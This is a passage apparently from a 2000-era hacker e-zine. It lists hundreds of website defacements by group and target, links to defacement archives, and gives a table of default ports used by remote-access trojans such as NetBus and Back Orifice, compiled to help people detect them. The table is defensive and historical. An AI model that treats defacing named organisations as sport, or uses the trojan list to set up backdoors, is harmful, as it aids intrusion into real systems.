M www.wannahaves.nl (www.wannahaves.nl) [00.11.02] NT [m0r0n/nightman] Seminar Hakibutzim (www.smkb.ac.il) [00.11.01] So [Havoc Korp] Royal Jordainian Web Site (www.rja.com.jo) [00.11.01] NT [TheKillers] Marshall Informatica S/C Ltda (www.marshall.com.br) [00.11.01] Li [keoki] M Silverton Chamber of Commerce (www.silverton.org) [00.11.01] NT [azndragon] C CIS, University of Bologna (www.cis.unibo.it) [00.10.31] NT [McM4nus] Banco Sudameris Brasil (Jarvis Entertainment Group (Total mirrors count.. Date OS Group/Person AMCK Site 2000 ~~~~ ~~ ~~~~~~~~~~~~ ~~~~ ~~~~ ~~~~~~~~ [00.07.13] NT [team legacy] O'Connor, Piper & Flynn (www.opf.com) [00.07.13] Li [SJ/bighawk] STACK Systems Co. Ltd (www.stacksystems.co.jp) [00.07.13] Li [RSH] Apollo Dayton (www.apollodayton.com) [00.07.13] NT [ov3rh4zz4rd] ActivityBoard.com (activityboard.com) [00.07.13] NT [] Cox Fibernet (www.coxinet.net) [00.07.13] NT [digital insanity] Maritime Telecommunications Network (www.mtnsat.com) [00.07.13] NT [team legacy] Fordham University (www.fordham.edu) [00.07.12] NT [team legacy] Virginia State University (www.vsu.edu) [00.07.12] NT [d00d00 kr3w] Vaamonde Comunicaciones S.L. (www.bornet.edu) [00.07.12] NT [d00d00 kr3w] Temple University (www.cspd.temple.edu) [00.07.12] NT [Papi/ICKIS] Servicio de Comunicacion en Linea (www.obsession.com.mx) [00.07.12] NT [cyb3r fuck3rs] Universidade de Sorocaba (www.uniso.br) [00.07.11] NT [x-s4nd3r] Ejército de Guatemala (www.mindef.mil.gt) [00.07.11] NT [team legacy] Boone County Public Library (www.bcpl.org) [00.07.11] So [Gforce Pakistan] Fermi National Accelerator Laboratory (d0sunmsu1.fnal.gov) [00.07.11] Li [RLC] Bellevue Tech (www.bellevuetech.com) [00.07.11] So [Gforce Pakistan] Fermi National Accelerator Laboratory 'cdsun2' Server (cdsun2.fnal.gov) [00.07.11] So [Gforce Pakistan] Fermi National Accelerator Laboratory (fncduh.fnal.gov) [00.07.11] NT [HCI] University of Essex (www2.essex.ac.uk) [00.07.11] Li [SJ/bighawk] Digital Media Interativa Comercio e Servicos (www.dmz.com.br) [00.07.11] NT [] North Dakota Supreme Court Home Page (www.court.state.nd.us) [00.07.11] NT [] Secretaria de Desarrollo Agropecuario y Pesquero (www.sedapver.gob.mx) [00.07.11] Ir [NuRaIn-ShAiKh] Big Buddies (www.bigbuddies.com) [00.07.11] La [datagram] Arisu Media Co,. Ltd (www.arisu.co.kr) [00.07.11] NT [Papi and ICKIS] Servicio de Comunicación en Línea (www.prestige.com.mx) [00.07.10] NT [Crime Boys] Gonzaga & Neves Ltda (www.atmnet.com.br) [00.07.10] NT [Crime Boys] www.dgdrural.pt (www.dgdrural.pt) [00.07.10] So [GForce Pakistan] Fermi National Accelerator Laboratory Cmstst Server (cmstst1.fnal.gov) [00.07.10] NT [SuBZeRo] Campus Colima (www.col.itesm.mx) [00.07.10] Su [SuBZeRo] Lazelle Street Land Company (www.sturgisrally.net) [00.07.10] Lu [Ben T] Aegis (www.kjofol.org) [00.07.10] NT [do0do0 krew] University of Texas at Brownsville and Texas Southmost College (www.utbtsc.edu) [00.07.10] BI [Team Holocaust] Owl Kaufpark (www.owl-kaufpark.de) [00.07.10] NT [Team Holocaust] Lance K Hofer (www.lkh.com) [00.07.10] NT [McM4nus] Inst. Brasileiro da Qualidade e Produtividade (www.ibqppr.org.br) [00.07.10] BI [Team Holocaust] AHG Handels-GmbH (www.ahg-art.com) [00.07.10] BI [Team Holocaust] M Dirk Gross (Elfenwald) (www.elfenwald.de) [00.07.10] BI [Team Holocaust] DV Controlling (Hombergen) (www.hombergen.de) [00.07.10] NT [McM4nus] Fundacao Estudar (www.estudar.org.br) [00.07.10] NT [Team Holocaust] Covenant Health (www.covenanthealth.com) [00.07.10] NT [cyb3r fuck3rs] Ass. Comunicacao Educativa Roquette Pinto (www.tvebrasil.com.br) [00.07.10] NT [cyb3r fuck3rs] Ministerio Do Meio Ambiente (www2.mma.gov.br) [00.07.10] NT [cyb3r fuck3rs] Ass. Comunicacao Educativa Roquette Pinto (www.radiomec.com.br) [00.07.09] NT [Anti Security] Carolina Panthers (www.panthers.com) [00.07.09] NT [MADMAN] Civil Aviation Safety Authority (www.casa.gov.au) [00.07.09] NT [id3nt] Music (TW) (www.music.com.tw) [00.07.09] NT [Team Holocaust] Lyric Opera Cleveland (www.lyricoperacleveland.org) [00.07.09] Lr [GForce Pakistan] ISI Home Page (www.isical.ac.in) [00.07.09] Bf [Crime Boys] Mario Gilberto Eichler Jznior (www.cybernegocios.com.br) [00.07.09] NT [Team Holocaust] Victory Sports Marketing Corp (www.ad-network.com) [00.07.09] Li [Gforce Pakistan] Luv India (www.luvindia.com) [00.07.09] NT [suPosix] Industria De Produtos Alimenticios Cory Ltda (www.icekiss.com.br) [00.07.09] Li [Gforce Pakistan] M Bollywood Pages (www.bollywoodpages.com) [00.07.09] NT [Team Holocaust] University Heights (www.universityheights.com) [00.07.09] NT [x-s4nd3r] Parlamentsdienste Informatikdienst (www.parliament.ch) [00.07.09] NT [:0)] US Small Business Classroom (classroom.sba.gov) [00.07.09] NT [M3L40] www.anticorrupcion.gov.co (www.anticorrupcion.gov.co) [00.07.09] NT [SuBZeRo] Central Association of Southern Baptists (www.source1.org) [00.07.09] NT [Team Holocaust] Web Service (www.web-service.com) [00.07.08] Li [Crime Boys] Claudionor Ramos Advocacia E Consultoria Empresari (www.webmultas.com.br) [00.07.08] Ir [El Pulpo] Prodima Alta Tecnologia (www.prodaltec.com) [00.07.08] NT [HC Pakistan] Unsigned UK - Resource for UK Bands (www.unsigneduk.com) [00.07.08] Lr [Jfs] #2 Openhack -- eWEEK Hacking Challenge (www.openhack.com) [00.07.08] NT [HackersCrew] MBK Media (www.mbkmedia.com) [00.07.08] So [Gforce Pakistan] Convergent Systems (www.tems.com.sg) [00.07.08] So [Gforce Pakistan] Mail Nexus (www.mailnexus.com) [00.07.08] Lr [] I Wanna Know (www.iwannaknow.org) [00.07.08] Lr [kortex] American Social Health Association (www.ashastd.org) [00.07.08] So [Gforce Pakistan] Department of Health and Human Services (vault1.acf.dhhs.gov) [00.07.08] Bi [DHC] Rubber Snake (www.rubbersnake.com) [00.07.08] Lr [DHC] Cyber Golf (www.cybergolf.org) [00.07.08] So [artech] Amevic (www.alzheimer-montpellier.org) [00.07.08] Lr [Napalm Death] Happy Web! (www.happy-web.org) [00.07.08] NT [SuBZeRo] Kumho Engineering company, Limited (www.kumhoeng.co.kr) [00.07.08] NT [SuBZeRo] Electronic Display Industrial Research Association (www.edirak.or.kr) [00.07.08] NT [M3L4O] Poli BR (www.poli.usp.br) [00.07.08] NT [M3L4O] CRA Gov (CO) (www.cra.gov.co) [00.07.07] Lr [shitkingz] M Sebastian Fiebiger & Tobias Stober (www.fs-gbr.com) [00.07.07] NT [] Cookbooks On/Line, Inc (www.cookbooksonline.com) [00.07.07] NT [McM4nus] www.lapampa.gov.ar (www.lapampa.gov.ar) [00.07.07] Li [Gforce Pakistan] Dev Sahai (www.agmoz.com) [00.07.07] Lr [GForce Pakistan] M Confluent Technologies Inc. (www.bittown.com) [00.07.07] NT [cyberpriest] Boise County Internet Site (www.co.boise.id.us) [00.07.07] Li [Crime Boys] Alamo Administradora e Corretora de Seguros LTDA (www.convergence.com.br) [00.07.07] Bi [Arogance] Thomas Ecker (www.ecker-online.de) [00.07.07] Li [Crime Boys] Allfarma Comercial Ltda (www.lrtur.com.br) [00.07.07] NT [ANALISTA] Idol Minds (www.idolminds.com) [00.07.07] NT [ANTI-ZONCKED] COTASnet (www.cotas.com.bo) [00.07.07] NT [Crime Boys] M EDI Informatica LTDA (www.edinternet.com.br) [00.07.07] So [rootworm] University of St Francis (www.stfrancis.edu) [00.07.07] NT [SuBZeRo] M Lady Furniture Co. Ltd (www.lady.co.kr) [00.07.07] 2k [SuBZeRo] MEGAMEDICAL IND. CO., LTD. (www.megamedical.co.kr) [00.07.07] NT [M3L40] Cinemark US (www.cinemark.com) [00.07.06] NT [McM4nus] Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar) [00.07.06] NT [McM4nus] Sernah (AR) (www.sernah.gov.ar) [00.07.06] NT [McM4nus] INTA Est. Exp. Agr. Saenz Peqa (saenzpe.inta.gov.ar) [00.07.06] NT [ANALISTA] Centro Federal de Educagco Tecnolsgica do Parana (www.cefetpr-unedcp.br) [00.07.06] NT [ANALISTA] Vianna & Zogheib LTDA (www.lpnet.com.br) [00.07.06] NT [McM4nus] Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar) [00.07.06] NT [M3L40] Ministerio de Educacisn Nacional (www.mineducacion.gov.co) [00.07.06] NT [Urbanus-BR] Bitcom (KR) (web.bitcom.co.kr) [00.07.06] Li [Crime Boys] Allfarma Comercial Ltda (www.livretur.com.br) [00.07.06] Li [Crime Boys] Cultura Ensinamentos Ltda (www.experimental.com.br) [00.07.06] NT [M3L40] Corteconti (www.corteconti.it) [00.07.06] Lr [Lotus] South Burlington School District (www.sburl.k12.vt.us) [00.07.06] NT [st3althy6 labs] MSD of Martinsville (msdadmin.scican.net) [00.07.06] NT [hackforce2000] Colorado School of Mines (oia.mines.edu) [00.07.06] Bi [team holocaust] Boy Scout Troop 389 (www.troop389.com) [00.07.06] NT [hackforce2000] Roanoke College (www.roanoke.edu) [00.07.06] NT [DrDoug] Orlandia Equip. Tecnicos Ltda (www.orlatec.com.br) [00.07.06] Li [ ] Goudvisse (www.goudvisse.com) [00.07.06] Li [UPL] Auto Restoration Inc. (www.autorestorationinc.com) [00.07.06] NT [x-s4nd3r] Ministero dei Trasporti e della Navigazione (www.trasportinavigazione.it) [00.07.06] Bf [artech] Northern California Fire Prevention Officers Association (www.norcal-fpo.org) [00.07.06] NT [votos locos] Mississippi State Personnel Board Website (www.spb.state.ms.us) [00.07.06] So [GForce Pakistan] M Midwest Group (www.bwtc.net) [00.07.06] Lr [GForce Pakistan] The Group 3 (www.thegroup3.com) [00.07.06] NT [hackforce] Ministerul Finantelor - Centrul de Tehnologia Informatiei Financiare (www.mfinante.ro) [00.07.06] Lr [shitkingz] M Bradley Byrnes (www.icmcomputers.com) [00.07.06] NT [obzerve] Checkmate Management Ltd (www.checkmate.com) [00.07.06] NT [Crime Boys] Bulgarian Government (www.mjeli.government.bg) [00.07.06] NT [Crime Boys] Spider Informatica LTDA (www.spider-df.com.br) [00.07.06] NT [Utreg] McManus and Sons (www.mcmanus.com) [00.07.05] NT [M3L40] Companhia De Informatica Do Parana - Celepar (celepar7.pr.gov.br) [00.07.05] Li [Crime Boys] Jucelia Queiroz Amaral (www.stepcell.com.br) [00.07.05] NT [M3L40] Centro Virtual de Estudos Polmticos (cevep.ufmg.br) [00.07.05] Lr [GForce Pakistan] networksetc.net (www.networksetc.net) [00.07.05] Lr [GForce Pakistan] www.mckenzieonline.com (www.mckenzieonline.com) [00.07.05] NT [M3L40] Kingdom of Saudi Arabia, minstery of information (www.spa.gov.sa) [00.07.05] Lr [GForce Pakistan] NOAA, U.S. Department of Commerce (www.NauticalCharts.gov) [00.07.05] NT [doodoo krew] Spokane Police Department (www.spokanepolice.org) [00.07.05] NT [cyberpriest] apiit.edu.my (apiit.edu.my) [00.07.05] C6 [Till] Employee Selection & Dev. Inc (www.employeeselect.com) [00.07.05] NT [cdrz/liasons] Retro Gallery (www.retro-online.com) [00.07.04] NT [fl3m] Shear Healthcare Resources, Inc. (www.shrmedquest.com) [00.07.04] So [ch1ck1e] Nerp (www.nerp.org) [00.07.04] BI [O ANALISTA] As Informatica Ltda (www.asinformaticabh.com.br) [00.07.04] NT [Crime Boys] Verbatim Corporation (www.verbatim.com) [00.07.04] Lr [shitkingz] M Oak Lawn Condos (www.oaklawncondos.com) [00.07.04] Li [Crime Boys] Marinho Assessoria Empresarial Ltda (www.marinhoassessoria.com.br) [00.07.04] Lr [mOs] Center for Advanced Technology (www.cat.gov.in) [00.07.04] NT [dobe and epic] Austin Peay State University (www.apsu.edu) [00.07.04] Lr [shitkingz] OMI, Inc (www.ofsnet.com) [00.07.04] NT [fish] Znet Tecnologia Aplicada (www.znet.com.br) [00.07.04] Lr [GForce Pakistan] MC Sony Entertainment Television Pvt. Ltd. (www.setindia.com) [00.07.04] Li [shitkingz] Darcy Brown (www.scarletpimp.com) [00.07.04] NT [#bash krew] Pennsylvania State System of Higher Education (www.sshechan.edu) [00.07.04] Lr [shitkingz] Huzzah! (white-star.org) [00.07.04] NT [never] New Jersey K12 Schools (www.peddie.k12.nj.us) [00.07.04] Lr [shitkingz] Digital Products (www.digital-p.com) [00.07.04] NT [cyberpriest] Canberra Edu (AU) (beth.canberra.edu.au) [00.07.04] NT [Jak/KP] C Editors Press Service (www.editorspress.com) [00.07.04] Lr [shitkingz] Burney Van Stone (www.burneyvanstone.com) [00.07.04] Li [shitkingz] The Eden Family (aaron.edenfamily.com) [00.07.04] Lr [shitkingz] Xoltrex (www.xoltrex.com) [00.07.04] NT [rapeworm] UltraNet Communications, Inc. (atserver.nh.ultranet.com) [00.07.04] Lr [shitkingz] pstu.pi.net.ua (pstu.pi.net.ua) [00.07.04] NT [wds] Anqui Gov (CN) (www.anqiu.gov.cn) [00.07.04] NT [Crime Boys] Facultad de Ciencias Econsmicas y de Administracisn (www.eco.unca.edu.ar) [00.07.04] NT [DeXeR] Oklahoma City University (www.okcu.edu) [00.07.04] NT [obzerve] C Whittier Partners (www.whittier.com) [00.07.04] Li [The Itch] Meredith Frederick Designs Ltd. (www.meredithfrederick.com) [00.07.04] NT [cyberpriest] www.bhak-frk.asn-bgld.ac.at (www.bhak-frk.asn-bgld.ac.at) [00.07.04] NT [cyberpriest] www.lycee.asn-wien.ac.at (www.lycee.asn-wien.ac.at) [00.07.04] NT [wds] web.cei.gov.cn (web.cei.gov.cn) [00.07.04] NT [wds] Kentucky K12 Schools (b-g.k12.ky.us) [00.07.04] Bf [Digital insanity] Igor Zingerman (aps.imperfect.net) [00.07.04] NT [cdrz] Ontario Secondary School Students' Association (www.osssa.org) [00.07.04] NT [Octane] Michael Smith (Puff Online) (www.puff-online.com) [00.07.03] NT [jak/kp] C Collectible Toys (www.collectibletoys.com) [00.07.03] NT [St3althy6 Labs] Utah K12 Schools (www.daggett.k12.ut.us) [00.07.03] NT [Digit-0] Lund Performance Solutions (www.lund.com) [00.07.03] So [GForce Pakistan] M Peng T. Ong (www.secondbeat.com) [00.07.03] NT [rapeworm] NSPlanning Inc. (cue21.nsplanning.co.jp) [00.07.03] Li [Crime Boys] Claudionor Ramos Advocacia E Consultoria Empresari (www.preferido.com.br) [00.07.03] 2k [jak] C The Sedlaks (www.sedlaks.com) [00.07.03] So [al & mei] Openhack -- eWEEK Emporium Catalog (www.openhack.com/cgi-bin/eweekorcl) [00.07.03] NT [Anti-Zoncked] Electroid Company (www.electroid.com) [00.07.03] NT [Hacker Jak] C John McElroy (www.e3online.com) [00.07.03] 95 [obzerve] C IDEA QUEST UNLIMITED (www.ideaquestunlimited.com) [00.07.03] Li [l4m3r cr3wz] C Michael Adolph (www.god-crew.de) [00.07.03] NT [SuBZeRo] www.ahone.co.kr (www.ahone.co.kr) [00.07.03] NT [cyberpriest] Bundes Gymnasium Schwechat (www.bg-schwechat.asn-wien.ac.at) [00.07.03] NT [cyberpriest] Gymnasium & Real-Gymnasium Wien 11 (www.grg11.asn-wien.ac.at) [00.07.03] NT [DeXeR] DTS Software (www.dtssoftware.com) [00.07.03] NT [wds] California K12 Schools (lausdnet01.lausd.k12.ca.us) [00.07.03] NT [rapeworm] New Media BC (www.newmediabc.com) [00.07.03] Lr [acid] James Knowles (Digital IRC) (www.digital-irc.net) [00.07.02] NT [jak] C Ed Guy (www.edguy.com) [00.07.02] Li [Crime Boys] Cunha Lanfermann Engenharia Ltda (www.projetosenegocios.com.br) [00.07.02] Li [datagram] Dayton Internet Services, Inc (www.dayton.com) [00.07.02] NT [rapeworm] Inglenet Software Corporation (www.merchantbridge.com) [00.07.02] NT [wds] California K12 Schools (nevco.k12.ca.us) [00.07.02] NT [rapeworm] Icron Systems Inc (www.icron.com) [00.07.02] NT [rapeworm] Inglenet Software Corp (iscnt2.inglenet.com) [00.07.02] NT [IZ Corp] Medical School, UCLA (www.pathnet.medsch.ucla.edu) [00.07.02] NT [Crime Boys] Pagina Oficial del M.G.A.P. (www.mgap.gub.uy) [00.07.02] Lm [rmImJ3c1PgFt2] Root-bega (www.r00tabega.com) [00.07.02] NT [rapeworm] Derived Systems, Inc (nt40-2.derived.com) [00.07.02] NT [Urbanus-BR] University of Tartu, Estonia (ois.oppe.ut.ee) [00.07.02] NT [Urbanus-BR] Israeli ORG (sdeyoav) (www.sdeyoav.org.il) [00.07.02] So [fluffi bunni] Official #EnglishPub Home Page (www.englishpub.co.uk) [00.07.02] Li [SoLDaTeK] West Yorkshire Broadcasting (www.magic828.co.uk) [00.07.02] Li [SuBZeRo] Israeli Commercial (www.bookkeeper.co.il) [00.07.02] NT [Jak] C Sarasota Amateur Radio Association (www.saraclub.org) [00.07.02] 2k [Jak] The Steel Network (www.studplank.com) [00.07.01] NT [Cyb3r Fuck3rs] Monumentos Historicos Nacionales (www.monumentos.gov.ar) [00.07.01] NT [McM4nus] Universitaet Zuerich (www.isb.unizh.ch) [00.07.01] Bi [DavidLetterman] Grace House Ministries (www.gracehouse.org) [00.07.01] NT [kenton] Rahal Schmitz Toyota (www.rahalschmitztoyota.com) [00.07.01] NT [System_Error_] Edition Net (nt1.edition.net) [00.07.01] NT [ka0x] angelcity.wingnet.com.tw (angelcity.wingnet.com.tw) [00.07.01] Lb [#svun] Superlearning Inc. (www.superlearning-inc.com) [00.07.01] NT [DeXeR] United Nations Development Programme (www.unchina.org) [00.07.01] NT [DeXer] Stillemans (www.stillemans.com) [00.07.01] Li [SuBZeRo] www.ishyprint.co.il (www.ishyprint.co.il) [00.07.01] NT [DeXeR] College of New Caledonia (www.cnc.bc.ca) [00.07.01] NT [DeXeR] Association of South Central Oklahoma Governments (www.ascog.org) [00.07.01] NT [St3althy6 Labs] North Dakota K12 Schools (www.cavalier.k12.nd.us) [00.07.01] Li [cyb3r fuck3rs] White Force (www.whiteforce.com) [00.07.01] NT [Crime Boys] All Ways Provedor de Acesso Internet (www.cult.com.br) Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ========================================================================== * Info supplied by the attrition.org mailing list. Cracked webpage archives (list from attrition) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/ http://www.hackernews.com/archive/crackarch.html http://www.freespeech.org/resistance/ http://www.rewted.org/cracked/ http://www.403-security.org/ http://www.projectgamma.com/defaced/ http://www.ironboxtech.com/articles/ http://www.net-security.org/ http://www.netrus.net/users/beard/pages/hacks/ http://212.205.141.128/grhack/html/default_hacking.html http://194.226.45.195/hacked/hacked.html http://alldas.de/crkidx1.htm ** NEW URL *** >http://defaced.alldas.de http://www.turkeynews.net/Hacked http://www.flashback.se/hack/ http://www.dutchthreat.org/ http://www.onething.com/archive/ http://www.2600.com/hacked_pages/ http://hysteria.sk/hacked/ http://erazor.vrnet.gr/ Cracked sites listed oldest to most recent...does anyone read these? huh? do ya? heh. and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ By: joakim.von.braun@risab.se Source: PSS Common Trojan ports to watch for: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After seeing several questions about traffic directed at ports as 31337 and 12345 I've put together a list of all trojans known to me and the default ports they are using. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port 80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack´99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil You'll find the list on the following address: http://www.simovits.com/nyheter9902.html (still in Swedish but it will be translated in the near future). To help anyone to detect trojan attacks, I´m planning to add information about the original names of the executables, their size, where they usually are hiding, and the names of any helpfiles they may use. I will also add tools or links to tools that may be of your assistance. Feel free to get back to me with any comments or suggestions. If you find new trojans I´ll love to get my hands on them, but please mail me first, as I don´t need more than one copy. If you have live experiance of trojan attacks I´m interested to read about your findings. Joakim joakim.von.braun@risab.se A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW ** http://datatwirl.intranova.net ** NEW ** http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/zine/hwa/ *UPDATED* http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHANGED TO -> http://defaced.alldas.de http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* (Dutch) http://www.securax.org/ *New* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Colombia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ -> http://defaced.alldas.de http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za ** DOWN AGAIN ** http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to cruciphux@dok.org and i'll review it and post it here if it merits it. @HWA A.2 Hot Hits ~~~~~~~~ Useless information for the curious: Country and domain hits to main news page main.php on hwa-security.net Only listed the top few countries, this counter was activated 12 Aug 2000 and little to no advertising has been done (as is obvious from our hits) it IS interesting to see that Europe are our biggest draws. * The site and zine author and core HWA crew are based in Canada. Pageviews per domain 1. Network 987 15.95 % 2. US Commercial 818 13.21 % *3. Canada 207 3.34 % 4. US Educational 168 2.71 % 5. Netherlands 160 2.58 % 6. Germany 139 2.25 % 7. Australia 103 1.66 % 8. Brazil 82 1.32 % 9. Sweden 80 1.29 % 10. United Kingdom 76 1.23 % 11. Croatia (Hrvatska) 72 1.16 % 12. Norway 67 1.08 % 13. Malaysia 53 0.86 % 14. France 53 0.86 % 15. Nicaragua 39 0.63 % 16. Hungary 38 0.61 % 17. Russian Federation 37 0.6 % 18. Taiwan 37 0.6 % 19. Israel 36 0.58 % 20. Korea (South) 35 0.57 % 21. Poland 35 0.57 % 22. Unknown 2247 36.3 % Plus 70+ other countries showed trickledowns also. Pageviews per region 1. North-America 1247 20.15 % 2. Europe 1073 17.33 % 3. None (.net, .org) 1019 16.46 % 4. Asia 275 4.44 % 5. Australia 125 2.02 % 6. South America 117 1.89 % 7. Central America 67 1.08 % 8. Africa 20 0.32 % - Unknown 2247 36.3 % Note the coverage, an interesting spread. several hits come from sites like .gov that were defaced by SKRU, GForce Pakistan and provided links to our page on their defacements. Jury is out as to wether this is a good or bad thing. I'll take it as a good thing for now. :p @HWA A.3 Mirror Sites List ~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= __ __ _ | \/ (_)_ __ _ __ ___ _ __ ___ | |\/| | | '__| '__/ _ \| '__/ __| | | | | | | | | | (_) | | \__ \ |_| |_|_|_| |_| \___/|_| |___/ Some of these are not keeping up with new issues like they should be, you can always get the latest issue from www.csoft.net/~hwa or join us on IRC (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux where the latest issues may be attained. I also upload all issues to etext.org, the zines are available thru their ftp service, updates are slow. - Ed New mirror sites *** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW *** *** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ *** http://datatwirl.intranova.net * NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.attrition.org/hosted/hwa/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites of no use to anyone. too lazy to kill em. *** Most likely to be up to date other than the main site. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** and -> http://defaced.alldas.de http://www.csoft.net/~hwa/ http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm @HWA A.4 The hacker's Ethic (90's Style) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ _____ _ _ _ | | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___ | |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __| | _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__ |_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| 